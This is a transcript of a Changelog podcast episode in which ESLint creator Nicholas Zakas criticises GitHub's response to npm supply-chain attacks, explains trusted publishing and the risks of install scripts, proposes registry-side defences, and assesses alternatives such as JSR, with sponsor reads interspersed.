The Changelog: Software Development, Open Source - Securing npm is table stakes (Interview)
Episode Date: January 29, 2026As the creator and long-time maintainer of ESLint, Nicholas Zakas is well-positioned to criticize GitHub's recent response to npm's insecurity. He found the response insufficient, and has other ideas ...on how GitHub could secure npm better. On this episode, Nicholas details these ideas, paints a bleak picture of npm alternatives like JSR, and shares our frustration that such a critical piece of internet infrastructure feels neglected.
Transcript
Discussion (0)
Welcome, friends. I'm Jared and you are listening to The ChangeLog, where each week we interview the hackers, the leaders, and the innovators of the software world.
As the creator and longtime maintainer of ESLint, Nicholas Zakis is well positioned to criticize GitHub's recent response to NPM's insecurity.
He found their response insufficient and has other ideas on how GitHub could secure NPM better.
On this episode, Nicholas details his ideas, paints a bleak picture of NPM's,
alternatives like JSR and shares our frustration that such a critical piece of internet infrastructure
feels neglected. But first a big thank you to our partners at fly.io, the platform for devs who just
want to ship. Build fast, run any code fearlessly at fly.io. Okay, Nicholas Zakis, talk at MPM on the
change log. Let's do it. This is the year we almost break the database. Let me explain. Where do
agents actually store their stuff. They've got vectors, relational data, conversational history,
embeddings, and they're hammering the database at speeds that humans just never have done before.
And most teams are duct-taping together a Postgres instance, a vector database, maybe elastic
search for search. It's a mess. Well, our friends at Tagger Data looked at this and said,
what if the database just understood agents? That's Agentic Postgres.
It's Postgres built specifically for AI agents, and it combines three things that usually require three separate systems.
Native Model Context Protocol servers, MCP, hybrid search, and zero copy forks.
The MCP integration is the clever bit your agents can actually talk directly to the database.
They can query data, introspect schemas, execute SQL, without you writing fragile glue code.
The database essentially becomes a tool your agent.
can wield safely.
Then there's hybrid search.
Tagger data merges vector similarity search
with good old keyword search
into a SQL query.
No separate vector database,
no elastic search cluster,
semantic and keyword search
in one transaction.
One engine.
Okay, my favorite feature,
the forks.
Agents can spawn sub-second
zero-copy database clones
for isolated testing.
This is not a database they can destroy.
It's a fork.
It's a copy off of your main
production database if you so choose.
We're talking a one terabyte database, fort, in under one second.
Your agent can run destructive experiments in a sandbox without touching production,
and you only pay for the data that actually changes.
That's how copy on right works.
All your agent data, vectors, relational tables, time series metrics, conversational history,
lives in one queryable engine.
It's the elegant simplification that makes you wonder why we've been doing it.
at the hallway for so long.
So if you're building with AI agents and you're tired of managing a zoo of data systems,
check out our friends at tigerdata at tigardata.com.
They've got a free trial and a CLA with an MCP server.
You can download to start experimenting right now.
Again, tigerdata.com.
Well, friends, we're here with our new friend and good friend, Nicholas Azakis.
Known by many things, created ESLint, author of many books.
and a person on in there with angst, you know.
So who doesn't have a little angst out there?
Yeah, we all got some angst.
But this one recently against GitHub's stewardship and securing of NPM,
which I know a lot of people have an issue with.
So when I saw this post and I read this post,
I got to get you on the podcast.
So here you are.
Welcome to the show.
Yeah, thanks for having me.
I think thanks for having me back.
I think I've been here before.
JS party, maybe, right, Jay, J.S. Party?
You know, we were talking about it yesterday,
and I know him online.
I feel like I've met him before,
but I didn't actually go back in our catalog
and look you up.
So I would only assume it was either
an old, old episode of the change log
or a not quite as old episode of James Party,
but for sure you've been on the network.
Yes, definitely.
I wasn't on the podcast.
That's why I said that.
Then welcome to the podcast.
Yeah, welcome to the both of us and the three of us.
What is the best way to open this can of worms,
honestly?
I mean, should we go to the end
and work where?
back? How should we begin this discussion on securing NPM and what GitHub can do about it?
Yeah, that's a good question. I think it might help to talk a little bit about 2025 and what was
going on with NPM then, and then we can jump off from there. So in September alone, there were
500 packages that were compromised on NPM, never mind the rest of the year, just five,
500 packages in that one month.
And those attacks didn't really look any different than any of the attacks that we've seen before,
which is basically like somebody steals some credentials one way or another.
They start publishing compromised packages.
They usually add like a pre-install or a post-install script that executes the malicious code.
and then they publish that to the registry,
and they just wait for people to download it.
And then as it downloads and that pre-install or post-install script runs,
that's when the trouble starts happening.
And we've seen a bunch of different iterations of this.
Sometimes it just is like looking to steal crypto.
Other times it's looking for secrets.
I mean, that was one of the big things last year was running Trufflehog,
to discover secrets on the user's machine
and then using those secrets to propagate itself.
And I think that we're pretty lucky so far
that the damage caused by these packages
has been pretty minimal.
I think one person lost like $500 in crypto
or something like that.
But it was getting to the point
where to me it's looking a lot like
somebody or a bunch of somebody's
are trying to figure out how to get packages into NPM
that will get distributed as quickly as possible
to do something that is a lot more damaging
than what we've seen so far.
And that was basically what led me to stop and think about
what's actually going on with NPM,
what could change,
and I think more like
what could the next attack look like if things don't change?
And from a maintainer's perspective as well, right?
Because you're looking at it from the lens of somebody who's maintaining highly used open source projects over the course of forever, right?
Yeah.
So, like, ESLint, which I help maintain, over 200 million downloads a month.
And we have had from time to time these very mysterious pull requests that show up where all it is is somebody like changing a dependency.
with no description or anything.
And when we ask them, hey, like, what are you trying to do on this?
What's the point of this pull request?
We get nothing.
It doesn't happen a lot, but it's happened frequently enough
that it's always felt to me like a penetration test to see
how easy it would be to land a pull request on ESLint
because it's downloaded so much.
And knowing that it's going to go out basically immediately
to all kinds of stuff.
CI systems and personal laptops and what have you.
We're always very, very careful about changing dependencies
and thinking about which dependencies you want to add into the ESLint package JSON file.
Because there is a big responsibility when you have a package that's downloaded so frequently
by so many different people.
And it just kept coming back to like,
No matter what I'm doing, no matter what security practices we're putting into place,
it seems like there's always some way for somebody to get in and cause trouble.
And we did have, I want to say maybe nine or ten years ago,
we did actually have a compromised package, get into ESLint,
but it was one of our own packages, and it was kind of traditional,
Somebody had reused their credentials on another site.
That site had been hacked, and they ended up having their NPM credentials stolen as a result,
and then they could publish ESLIN packages using that.
After that, we changed so that nobody's individual NPM account has published rights for ESLint packages.
But we're still in this situation where, like, we use so many dependencies,
and not to mention, like, dependencies of dependencies,
that it's almost impossible to protect our users
if some malicious package gets in the dependency tree somehow.
So GitHub did respond to this,
or they have done some changes.
I don't know if it was in response or the timing was correct,
that it seemed like it was in response.
We had, for us, Abukad DJ on the show,
last year talking about just the onslaught
and some of the details of those hacks,
and it was fun to hear about how the hackers
are due their hacking.
And at the time, I think GitHub had announced some changes,
changes but hadn't actually done them yet or rolled them out.
You address some of those from a maintainer perspective.
It seems like your read on the GitHub changes to the way it works is more maintainer
burden and perhaps too tightly scoped.
Is that fair to say?
Or we want to give your impressions of some of the things they're doing to react to this
because they're in the position as the platform to be the most influential reactor.
Or are they the ones that have to basically make some.
changes, right? Yeah. So my read on the changes that they made was that it was pushing more
responsibility onto maintainers. So eliminating the kind of older style tokens, I can understand
fine-grained tokens are way more secure. Like that makes sense. But then limiting the lifetime
of those tokens, they went through a bunch of iterations. I think they finally landed
on like 90 days, that alone, like if you're doing token-based publishing, like now you need to
remember to update your tokens every 90 days or you have to implement some sort of automation
to do it for you on top of whatever else you're already doing. And the response to that was,
well, if you use trusted publishing, the Open ID Connect feature that they have in GitHub Action,
then you don't need to actually store a token anymore.
It's generated on the fly,
and you can just publish using that.
And that sounds great.
Like it's a good solution to not just have a token laying around
that somebody can use.
It's kind of a lock-in thing, though, right?
It's kind of a lock-in thing.
Well, it is.
I mean, number one, that's great if you're on GitHub
or GitLab also supports it,
but what if you're not on either of those platforms?
Right.
Like not every company in the world that's publishing NPM packages is using GitHub.
They might have private repositories.
They might be publishing directly from their internal repositories and not having stuff out on GitHub or GitLab.
And then the other problem is that there's no two-factor authentication for trusted publishing.
And as a result, the Openjs Foundation even came out and just said for critical packages,
we recommend that you don't use trusted publishing
because if somebody is able to get access to your GitHub repo,
all of a sudden they're going to be able to publish your packages
and you won't know until it's too late.
So trusted publishing is the beginning of a good solution.
It's just not all the way there yet.
Can you break that down?
What exactly is trusted publishing?
Yeah.
How do you explain that?
So trusted publishing is basically you go into NPM and for your individual package, you say,
I want to enable trusted publishing from this source code repository specifically, and then this
workflow specifically, the exact name of the file.
And when you enable that, then you can upload your GitHub actions work.
file into your repository and set the permissions for ID token.
And then GitHub actions will, when it runs that workflow, will request a token on your behalf
from NPM and then bring it back in and use it just for as long as the workflow is running.
And then that token is no longer useful anymore.
basically it's on-demand one-time use tokens for NPM.
Is that used by a lot of maintainers?
Is it well, it's not fully implemented though, right?
Well, so it's partially implemented now without two-factor authentication.
That's the big thing that's missing.
And there are a lot of people who are moving to it,
specifically because they don't want to have to deal with rotating tokens every 90 days.
That's just a lot of work.
and especially if you consider, like, I think for me,
I might be a maintainer for something like 100 packages,
maybe more than that, I'm not sure.
Some of them are pretty small and inconsequential,
but sometimes those are the ones that make their way
into larger dependency trees,
and it can get in trouble with those.
And so the initial reaction from myself and a lot of maintainers,
we read the post about the change,
was like how are we going to scale this?
How am I going to update all of these packages to do all of this?
And there was no batch operation to update a bunch of packages.
You have to go in individually to each package and go through like multiple two-factor
authentication approvals as well just to do it for one package.
And I've been told that there's going to be a batching tool coming out.
I'm still not there yet.
But in the meantime, they still rolled out these changes fairly quickly to people
to kind of force changing over to the granular tokens with shorter TTRs
and the trusted publishing.
And so there were just a lot of maintainers.
You're just throwing a ton of work onto our platforms.
and the tools to help us do that work aren't even there yet.
Can you walk through why trusted publishing is trusted?
What makes that trusted with this part of the workflow?
Like the single workflow, YAM will file in actions, what makes that trusted?
Yeah, so it's trusted because it is known ahead of time that that is the one location
that you can publish from.
Like any other workflow that you add, you can ask to get the idea.
token and published NPM, but that workflow is untrusted.
So it can't actually use a token to publish to NPM.
So it ends up being just a form of validation between that workflow and NPM to validate
that it is allowed to publish that package.
So the, I guess, pre-ceremony, the Pita factor of this pre-ceremony is what makes it more
trustable because you're going to go through the emotions of actually setting it up, naming it,
defining it, putting in the repo. There's some sort of song and dance between GitHub and
NPM to trust that singular YAML file, and that's the one that's trusted, that workflow.
Yeah, which again, like is actually a nice system. If you're on GitHub or GitLab
and you don't worry too much about needing two-factor authentication, it's a decent,
system. But to me, again, it's still GitHub and NPM saying, like, okay, maintainers,
like, you need to do more to protect everybody from you being a victim of your credentials being
stolen, which is why in my post, I use the analogy of credit cards where, like, there's a lot
of fraud using credit cards. And that's why credit cards, and that's why credit cards,
companies keep introducing new ways of validating that you're the authorized user of the card
that you're using, whether that be the CVC number on the back or the chip that is in the
card or in Europe needing to add a pin in addition to your chip.
They do all of that stuff to hopefully prevent people from using your credit card number
without your permission, which again, is great.
Like, we should do that.
There needs to be some way to help consumers of credit cards, users of NPM, to protect
themselves from having their information stolen.
But credit cards don't just stop there.
They're also doing anomaly detection with each transaction that's coming through to figure
out, like, does that look like something you would normally do? And so if you've ever been traveling
or just make a big purchase, you may get a text message that says, hey, we just got this charge
for this amount at this location. Was this you? And if you say yes, it says great, you know,
go right ahead. If it says no, then it will block the transaction and they start the fraud
investigation process.
And that way, they know that, hey, nobody's going to be 100% at protecting their information
from being stolen for a variety of reasons.
So let's not just rely on that.
Let's also do some analysis and see if we can figure out if something bad is going
on before it gets too far down the line.
And that's where I think that NPM.
has been kind of missing some clear actions that they could be taking to protect us better.
What makes you think they're not doing that already and just doing it poorly?
Well, from what I can tell, they have some ability to do this because they said in one of their
blog posts that once they identified the pattern of the credential stealing attack, then they were
preventing new packages from being uploading that had that same kind of signature.
So they do have that capability to do like a real-time analysis of packages as they're being
uploaded.
But it just doesn't appear that they're doing much else with that capability just because of
how frequent the attacks have been.
Like if it was like, oh, like once a year, it's like, well, maybe like during those 11 months,
they were kind of tweaking some knobs and twisting some things and trying to figure stuff out.
But it was like every single month, another attack almost doing the exact same thing.
And then later them coming in and saying like here's what we did to clean up the mess.
And I just feel like the technology is there to prevent the mess before it happens.
and for whatever reason, I'm guessing, probably lack of resourcing, that it's just not getting done.
Because I have talked with folks who work on NPM, like, they're really dedicated, they're really smart.
And the sense that I always get is just like there's a really big backlog, there's not enough people to work on it.
And so the stuff just kind of sits until there's an emergency.
and my read on the response last year.
And I have no inside knowledge of this at all.
This is just my interpretation of what I was seeing,
was that the things that they were rolling out
were things that were probably already on their roadmap
and just needed a little push.
And this was the push of like, you know,
running it up the chain and just saying,
hey, these like three things we've been trying to get through for the past nine months.
Like this would actually really help with these attacks.
So can we prioritize and resource these?
And that's why we got those.
Again, just my theory.
But it just, it seems like, and I gave this feedback directly to them too, that I just feel like all of this is attacking the problem from the wrong end at this point.
Well, friends, I don't know about you, but something bothers me about getting up actions.
I love the fact that it's there.
I love the fact that it's so ubiquitous.
I love the fact that agents that do my coding for me believe that my CI CD workflow begins with drafting Tommel files for GetUp Actions.
That's great.
It's all great.
Until, yes, until your builds start moving like molasses.
Get Up Actions is slow.
It's just the way it is.
That's how it works.
I'm sorry.
But I'm not sorry because our friends at Namespace, they fix that.
Yes, we use namespace.so to do all of our builds so much faster.
Namespace is like GitHub actions, but faster.
I mean, like way faster.
It cashes everything smartly.
It cash your dependencies, your Docker layers, your build artifacts,
so your CI can run super fast.
You get shorter feedback loops,
happy developers because we love our time,
and you get fewer, I'll be back after this coffee and my build finishes.
So that's not cool.
The best part is it's drop-in.
It works right alongside your existing GitHub actions with almost zero config.
It's a one-line change.
So you can speed up your builds, you can delight your team,
and you can finally stop pretending that build time is focus time.
It's not.
Learn more.
Go to namespace.
That's namespace.com.
Just like it sounds like it said.
Go there, check them out.
We use them.
We love them.
And you should too.
Namespace.
Well, there's one big difference between the credit card companies and GitHub slash Microsoft.
Otherwise, I agree with you entirely with the methodology of like, you know, inference and fraud detection, like analysis, be more proactive than reactive, etc.
Is that the credit card companies get paid per transaction, you know?
So like there's money directly tied to that process.
And what is NPM to GitHub?
to Microsoft, you know, it's, it seemed like it was a fig leaf at a time when NPM needed one,
you know, to continue to exist. And so acquisition, but where is the revenue coming from?
Like what, what's it doing for GitHub? What's it doing for Microsoft? And so I understand,
although we tend to get cynical over time, I understand why it's hard to actually allocate more
resources because it's like, this is not their main thing. It's not even their like seventh main thing.
It's just like a thing that they have that's hanging off another thing that they bought.
Like they bought the GitHub and they got the NPM and they're like, well, you know, like I understand.
For the rest of us, it sucks.
And what do they lose?
When we have these, they lose a little bit of goodwill, right?
A little brand tarnishment, but not much.
They're not losing enough trust that they're not making money on transactions where it's like credit card companies.
You got to trust that credit card company in order to actually use their card.
And for Microsoft, you know, if there's another NPM.
security breach. I'm sure they don't like it. Nobody likes it. But it's not revenue
generated. And so how do you actually get that done? And it's probably explaining some of the,
what you're sensing is the lack of resourcing is probably the reason why. I'm not sure
if we ever bridge that gap, you know, like how is it ever going to be worth it for them?
Yeah. And I think that's exactly the problem is that the NPM
registry is a huge cost sink.
It is wildly expensive to run, requires a ton of bandwidth.
All kinds of companies are relying on it every day running in their CI.
And when the NPM company, NPM Inc.
was running, like they needed to sell because they couldn't afford to run the registry
anymore.
Right.
And it really was GitHub being like, hey,
we are a haven for JavaScript developers.
They didn't have to do that.
They didn't need it.
Because at the time, I think it was just a few months earlier,
they had actually announced their own NPM compatible registry
built into GitHub, which is still there,
but it doesn't seem like people use all that much,
except maybe as like private repos inside of companies.
So they didn't really need to buy NPM.
I don't know who would have bought it.
otherwise.
But at the same time,
it's like, you know, if you adopt a dog,
you should take care of the dog.
We all agree on that.
Like, you can't just adopt it.
Take care of the dog, GitHub.
Well, I mean, I think they would argue,
well, we are taking care of it.
We have a staff of three in their entire point.
And we're paying, I'm just made out that number.
But, you know, like, well, there's three people,
full timers.
We can calculate that out.
We're talking a million dollars a year.
that we're just keeping the dog alive, you know, or whatever the number is.
Yeah, yeah, absolutely.
And it's not going to get better than that.
They're not going to go to two million.
There's no reason to as long as the dog's still alive.
Now, maybe it gets so bad, the dog eventually dies.
Right.
Well, so my counter to this argument, which I completely understand,
is that all it takes is one attack that costs people millions of dollars
in some way or costs a company millions of dollars before this becomes not just a like,
oh yeah, hey, we're keeping it alive.
But, you know, like there's a responsibility because if you don't take care of that dog,
it's going to start biting everybody in the neighborhood.
And then you're looking at not just like, oh, this is, you know, it tarnishes our reputation.
Like it doesn't look good.
now you're looking at like significant financial repercussions and you know I'm sure there's stuff
in the terms of service that says that they can't be sued but that's I was just going to ask like
could you actually go after them legally for negligence or something but you know there still might
be some big company out there that's like hey you know what we're just going to try it because
we're a you know multi-billion dollar company and we have the money to throw at lawyers and why not
We'll give it a shot and see what happens.
But this has been my concern for several years now is that when you treat these attacks as a nuisance,
you leave the door open for more sophisticated attacks that are going to cause more trouble in the future.
And I don't know what those look like.
I mean, I could imagine another type of situation where we had, you know, the crypto stealing package.
Like, what if that wasn't targeting a crypto website?
Like, what if that was targeting like a major banking website or a major stock exchange website?
What would happen in that situation?
and would those people who lost money through an NPM package that was compromised,
would they even understand what was going on?
Or would it just be like, oh, by virtue of being on the laptop,
I just got screwed?
So I feel like that bigger attack is coming if something major doesn't change.
It's likely, right?
I mean, it's likely that a large player in some game with, you know, deep implications is using dependencies from get or MPM.
It's, you know, it's like a 99% likelihood that someone's using it somewhere on the front end and it's a attack vector.
You may already be exploited, right?
Yeah, you may, you know, these little pokes may actually be just a precursor.
Nicholas, do you have any insight into how staffed NPM is given your presence in the community?
I don't. I've only had direct contact with one person, and I don't feel at liberty to discuss
what we've talked about, but I don't have an idea of how big the team is. My only sense is that
it's fairly small.
I would say demystify the black box of staffing,
just so the community knows.
Yeah.
Is it being staffed?
Is it understaffed?
Is it, you know, like, I don't know.
I mean, if we're relying on this registry and ecosystem,
at least be clear on what is what's not clear with that part of it.
Like, tell us.
Yeah.
I mean, it's, I think last year I opened up an issue on NPM.
And maybe by the end of the year, it got a response, like, not even a like, oh, this is a good idea, this is a bad idea, just that like, oh, hey, that's interesting.
And that was a good indicator to me that it was probably not resourced appropriately.
I mean, especially when, like, PMPM came out after one of the attacks, I was like, okay, we're not going to let people install any package that's, like, newer than seven days.
or something, in the hopes that that would prevent people from rapidly downloading
compromised packages before they could be caught and removed.
And that PNPM moved faster than NPM, I think, was a bit of a wake-up call for me.
Now, they're doing it on the client side, so, you know, how big of an effect does that have?
I would guess, like, not huge.
But they were trying to do something that they seemed like,
might help and was within their power to do so,
which I applaud them for.
And like with NPM, it just felt a little like,
okay, these were some stuff that we were planning on doing anyway,
and we're just going to roll those out.
And yeah, we'll see what happens.
Yeah.
Let me ask a question that's maybe been asked,
but maybe not directly like this.
Like, is it still prudent to even use NPM,
given like the fact that you put an issue
out there and it took that long to get a response or just the the seemingly lack of speed or
initiative on the nuances like i don't think security is a nuance but you'd mentioned that they're a
nuisance which is a close end word to that you know what's going on i mean should we keep using
mpm are there alternatives should we create an alternative if it was a possibility what would
that organization look like do you have any insights there yeah so i think the short answer is
is that the inertia behind NPM is so great
that it's very difficult to extricate ourselves from it at this point.
Like any, I mean, any JavaScript package that you want to install,
you look at the ReadMe, it says install from NPM.
People don't even know what else to do besides go to NPM
to look for these packages.
And, you know, Dino started an alternative package manager,
called JSR, which I actually had high hopes for because I think that they put the type of thought
into security instability and stuff like that up front that NPM has kind of been adding on as it goes.
Just like right from the start, not allowing package name squatting, reserving certain
package scopes that could be confusing to people.
Like when I went to go sign up for JSR and I tried to grab the ESLint scope because my
initial reaction was like, oh, God, like, here's another place that I need to grab all
the usernames on.
And ESLint had been reserved.
Like you couldn't actually go on the website and just say like, okay, I want the ESLint
scope.
You actually had to apply for it and prove.
that you're the right person to be handling that scope.
And they approved me really quickly because they knew who I was and that I was involved
with the S. Lent. So I was able to get that. They had trusted publishing right from the
start or else you have to use two-factor authentication to publish locally.
They, you know, no pre-install or post-install scripts. There's just a lot that was really good
about JSR, and it basically suffered the same fate as NPM, just on a much faster timeline,
which was basically, you know, there was a lot of, like, a lot of interest early on, a lot of
activity, a lot of iteration. Like, I was filing issues on the JSR GitHub repo. They were getting
answered, like, sometime within hours, and things just getting fixed and pushed out. But
eventually that timeline started expanding to the point where I wasn't getting any responses anymore.
Even to bug reports, there was, I mean, I was finally able to get one response when a new version of Dino was pushed out and that broke the command line, the JSR command line tool.
It was finally able to get a response from them to get that fixed fairly quickly.
They had announced that it was going to be an open governance registry for JavaScript,
and they had formed a committee that had people from, like, NPM, and Dino, and I think Open JS Foundation and Volt,
and that just kind of went nowhere.
There hasn't been any updates since then.
Like, JSR is still running, but as far as I can tell, it's most.
an abandoned project at this point.
And there's just some of the Dino diehards,
I really like to use it,
but it doesn't seem like it's ever going to be
a real competition for NPM registry.
What is the downside to pre-imposed install hooks?
I get what they do.
But what is the downside?
You said there's none on JSR.
Is that something you agree with?
Is there a way to do it safely?
What are your thoughts?
So pre-install and post-install scripts on NPM are designed to let you run additional commands after install in order for a package to work.
And NPM was based on a package manager at Yahoo, where I worked for five years, called Yinst.
and yinst was the way that all of the machines were built inside of yahoo.
And these pre-install and post-install scripts could run in yinstsd to help you set things up after you got resources installed.
And that turned out to be pretty helpful to be able to set up machines.
That was copied over into NPM with the same idea.
The difference, though, is that yinst was an internal system.
so there was implicit trust with all of the packages that were published and yet.
For NPM being a public system, you don't have that implicit trust.
And I think that this is probably something Isaac would have rethought when he was designing the system,
knowing what he knows now.
But the NPM ecosystem kind of became dependent on those scripts.
because of the ability to publish native NPM packages
that were actually compiled like C, C++ packages
where you can't publish the compiled artifact itself
because it has to be compiled individually for each machine.
And so these post-install scripts are what allow these native modules
to be used and installed on any machine
because it just downloads a source code
and then on your machine it compiles it
into the form that can be used
and then you can just run it.
And there are a lot of packages that use that now
because every once in a while somebody will say like,
well, we'll just ban like pre-install and post-install packages,
but if you do that, you kill off a non-trivial portion
of packages on NPM that people are relying on.
And the other thing about that is you can actually say, you know, NPM install dash-dash ignore scripts, and it won't run any of those scripts.
And that's a great solution unless you end up with one of those packages in your dependency tree that needs to be compiled and you might not even be aware of it.
And so just disabling that or just always saying, like, don't run those scripts, that also has the effect of potentially breaking people's experiences in ways that they didn't anticipate.
And if you've ever had any trouble with a deep dependency that needs to be compiled that wasn't compiling, it is really difficult to debug.
And so I think any package manager that would start from scratch, or any registry that would start from scratch now, would be wise to not even have this concept of pre-install and post-install scripts and just say, you know, we're not dealing with compiled packages at all, which is what JSR does.
But if you want to enable compiled packages, it's kind of the necessary evil you have to accept.
Do you mean the post-install or pre-install is going to install a compiled binary,
and that's the threat, is that it's compiled and you can't see into it?
No, so the threat is that the pre-install and post-install can run anything.
Yeah, exactly.
Like, it might not compile anything.
And this is what happened last year was these packages would download and install Truffle-Hog,
which is a secret scanner, and just execute it and find all the secrets and tokens on your computer when you downloaded it.
it's one of those situations that, like, Dino was trying to prevent with its permission system,
like, okay, you have an NPM package.
Like, should it be able to call back out to the internet for some reason by default?
Like, that kind of seems like a bad idea.
And so the permission system in Dino was built so that any time a package was trying to do something that was unanticipated,
reach out to the network, read something on the file system,
you would have to opt into that behavior.
And I know there's been some experiments with that on NPM.
I don't think that those permissions actually apply
to pre-and-post-install scripts, if I remember correctly.
But that is something that they could look at as well.
of just like, okay, maybe pre-install post and scroll scripts are not allowed to just willy-nilly, like, go out to the internet.
Maybe they need to get like opt-in permission from the user in order to do that first.
I imagine that would be a little bit more complicated than I'm making it sound.
Yeah, but it's another option around this.
I mean, my preferred option, which I talked about in the post, is just say, hey, if a package
previously did not have a pre-install or a post-install script, and then it adds one, like, don't
allow it to be a patch or a minor version upgrade.
Like force it to be a major version upgrade.
Because for most people, that will not be installed automatically.
as like the minor and the patch versions are.
So if you just said like, oh, hold on, for this like 1.x branch of this package,
you never had a post-install script before.
And now you do, sorry, you've got to bump that to 2.0.0 before we're going to publish it for you.
And I think that that alone would slow down attackers tremendously.
Yeah.
Because people will just not automatically be downloading those.
packages anymore and hopefully someone like maybe it's socket or maybe it's npm themselves
will then have the time to identify that as malicious and get it pulled down before it is downloaded
millions of times that's awesome to suggest like if it's uh i like your idea of course as well i think a
major version bump is it's going to slow it down it's not going to prevent publishing it still
allows movement so if it's your package you just to move along but anyone else has to sort of
adopt that based upon their simver but what if you were constantly scanning any any package or
project that had a pre or post install script anytime those were added or included and forevermore
that one gets special attention special scrutiny on that script if you're base 64ing something
if you're doing something nefarious, if you're making a network call,
if you're doing an install of any sort, it's looked at
and it has to be scanned and verified, like a security verification,
so that at least you have some check and balance.
Yeah, I like that idea a lot.
I think that for too long, we've just been saying, like, oh, you know,
they go and add a post and sell script, and gosh, like, that's terrible.
But, yeah.
I think it's great if it's done wisely.
I like the idea, you know, a lot.
But there are all kinds of things that I think can be done with these packages
to just make sure that they're safe.
And yeah, I love that idea of just providing extra scrutiny to those.
I mean, it could be the case that, like, you know, you even need, like, a waiting period
if you're changing or adding, you know, post-install scripts.
And this is the thing that I found a bit frustrating is I feel like there are some low-hanging fruit options that are out there that would actually not be very resource-intensive to implement on NPM, which is why my suggestion of just requiring a major version bump was one of the things that I put out there.
I don't think it's super complicated to implement.
But let's just start doing something during the published process
instead of just relying on people discovering it
after something has been published and then downloaded a bunch of times.
I mean, you can even introduce, I mean, you got verified publishing,
why not verified publishers?
You know, if you're going to give somebody the PDA factor to, you know,
make a token, you know, renewable in some way shape or form or a just in time credential that makes sense for the maintainer,
why not only give certain types of ability, like the pre-imposed install, for example.
If it's such a powerful thing, anyone who wants to use that, in addition to that, verify all maintainers or the organization or the maintainer,
the kind of core maintainer, have some sort of connection to one real person inside of that.
package, project, whatever.
And if you can't do that, then I'm sorry,
you don't get that very special ability
for this trusted network or should be trusted network.
It takes people though, right?
A lot of software can automate a lot of that, really.
I mean, you can do a lot with that process.
I think that the resources for that would probably be
fairly high and probably more than it could get in a short term.
Let me say that. I think if you if you're GitHub though, right, if this is GitHub, which it is, then you have GitHub at your ready.
So for those publishers, one easy way you can do it or one easier way is you can leverage the already need for securing GitHub, which is that project or that person has to use GitHub off.
So you have a one person or somebody there. Like you can leverage at least get a bot and all the security put behind GitHub itself to have one verified member or at least one member in the party.
Gotcha. Yeah. Yeah. Interesting. I think potentially an easier solution, which is a little bit
heavy-handed, as you could just say, okay, all packages that have pre-and-install
scripts right now, you can keep doing it. Anybody else, you don't get to do it. We're basically
cutting that off now and saying that, you know, we're grandfathering in all those old packages
so they will continue to work.
But new packages, sorry, you're out of luck.
We're just not going to do it for you.
You need to figure out a different way to distribute stuff.
And you can just tell your users a couple steps before and after, right?
I mean, that's the easiest problem method that you could do is just tell your users,
you got to do something before and do something after to make this work right.
Yeah.
It's unfortunate.
Yeah, just go ahead and write your own.
shell script. Or, you know, here's the shell script, download it, and you need to run this,
and then after that, it's fine. Right. It's, yeah. But, you know, again, I feel like there are
some lightweight solutions that could be done instead of putting more responsibility on
maintainers every time there's an attack. Well, friends, this episode is brought to you by
Squarespace. I love Squarespace. I'm a user of Squarespace, and Squarespace is an awesome
all in one platform where you can stand up a professional site, offer paid services, get paid the whole thing without writing a single line of code or debugging CSS.
They've even got Blueprint AI now, which takes basic info about what you're building and generates a fully custom site with actual design recommendations.
Not a template you have to fight with, but a starting point that already looks like you thought about how it should look.
And for the data nerds out there, I know you.
That's me too.
Built-in analytics are cool.
See your traffic, see your revenue, see your bookings, see your sales.
Figure out where to focus all from one single dashboard, no third-party apps, no GDPR headaches.
Just there for you.
And whether you're launching a side project selling a course or finally replacing that under-construction web page you've been kicking around,
Squarespace handles the website part so you can focus on the thing you actually want to build and the content you want to create.
So head to Squarespace.com slash changelow for a free trial.
And when you're ready to launch, use our offer code,
change log to save 10% off your first purchase of your website,
Bory Domain.
Once again, Squarespace.com slash changelog.
I'm saddened by your report about JSR.
I had high hopes for it.
It seemed like, like you said,
it was off to a good start.
And I wonder what happened there.
Like what?
Why?
But what about Volt?
You mentioned Volt.
That's another one that's been up and coming from a long time, you know, JS ecosystem people, Darcy Clark and friends.
And then backed by a lot of people who have been around the ecosystem forever and have, you know, benefited and had issues with NPM over the years.
Is Volt been manifest?
Is it a thing?
Is it still becoming a thing?
Is it a viable option?
Because eventually we can't make GitHub do anything.
And so if they're not going to do anything, we can continue to tell them they should and try to convince them.
But having some other alternative, which I was hoping JSR would become, would be at least somewhere you could put your efforts into and say, let's all do this instead.
And it would be grassroots and it would be a lot of work.
And I understand there's billions of things being downloaded every month off of NPM.
but if the package maintainers had somewhere to point people and say,
you know what,
for new versions of ESLint,
you got to go here,
you know,
put it in your post install script.
This is an old version of ESLint for the new version.
I'm only publishing on this other platform for,
go read my blog for the reasons.
If you can get like the top 100 packages for maintainers to do that,
you could probably make a dent,
but we have to have somewhere to go.
And if JSR is not going to be it,
is Volted alternative?
What do you know about that one?
Yeah, so Volt, as far as I know, was not in the business of providing a registry.
It was more around tooling around NPM.
Like a new client that does fancier stuff?
Yeah, basically new client does fancier stuff, more secure, etc.
I haven't seen anything notable come out of that.
In fact, again, I'm starting to think this might be me.
I opened, I was trying out one of the Volt tools, and I went and I found a problem and I opened an issue on the GitHub repo.
Again, it just sat there for months, just no response at all until very, very late.
I mean, again, maybe by the end of the year, somebody was like, oh, this is fixed in the latest version.
It's just I don't know what's happening over there.
and it just, I don't think that JavaScript registries are good business, fundamentally.
And I think that NPM Inc. figure that out and glad for them that they're able to get out
and get the registry into a place where it would at least be up and running.
I feel like JSR basically the same thing happens.
where, you know, JSR was being funded primarily through Dino, even though they wanted to make it more of a
community thing.
Like, fundamentally, like, they came up with it.
They were running it.
You know, they had it on their infrastructure.
But, you know, they are a startup.
Like, they need to figure out ways to make money.
And JSR was just a way to spend money.
I mean, it's nice.
It's a nice gift to the ecosystem.
But they still need to figure out a way to make money.
to turn a profit to pay back investors.
So the chances, I think, that JSR is going to grow up into something else is probably pretty
slim.
And like you, I was pretty excited about it.
I think they got a lot of stuff right.
But one of the challenges of, again, like having a competitor to NPM is like, number one,
you can't actually do quote-unquote binaries like ESLint on JSR.
You can't just say like JSR install ESLint and then just run ESLint.
It doesn't work that way.
And then two, any alternative to NPM needs to be compatible with NPM.
Because unless you're able to use all of the packages just on that new registry,
you're going to have to mix and match between NPM and that new registry.
Sure.
And that's also something that JSR just did not get right.
if you try to use JSR packages in with NPM packages
in a package that you want to publish
just straight up doesn't work
because we tried to do this
with one of our ESLN packages
because the nice thing about JSR
is Dino published a bunch of like standard library
type packages on there and they're really good
and so we wanted to use one in one of our packages
and it ended up being such a pain that we just copied the source code
from the JSR package into our repo in order,
so we could package it and publish it up onto NPM.
